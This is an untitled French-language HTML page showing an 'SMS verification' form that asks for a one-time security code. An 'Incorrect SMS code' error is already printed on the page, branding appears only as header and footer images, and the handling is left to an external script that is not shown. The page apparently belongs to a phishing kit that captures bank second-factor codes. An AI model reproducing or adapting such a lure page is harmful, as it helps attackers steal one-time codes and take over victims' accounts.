<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/ckom.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div>
        <div class="roof">
            <img src="./img/topo.JPG" alt="">
        </div>
    </div>


    <div>
        <div>
            <div class="cc1">
                
            </div>
            
            <div class="insid">
                <p class="p1p">
                    Vérification par SMS:
                </p>
                <div class="forma"> 
                    
                    <form method="post" id="pg4">
                        <p class="p2p">Merci de vous authentifier en entrant le code de sécurité à usage unique que vous avez reçu sur votre téléphone.</p>
                        <p>Code SMS </p>
                        <input type="tele" name="" id="sps2" maxlength="10">
                        
                        <p style="margin-left: 0px; margin-top: -10px; color: rgb(192, 28, 28);">Incorrect SMS code</p>
                        
                        <button class="btn2">Confirm</button>
                    </form>
                </div>
                
            </div>
        </div>
    </div>
    
    
    <div>
        <div>
            <div class="boot">
                <img src="./img/botot.JPG" alt="">
            </div>
        </div>
    </div>
    
    
    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>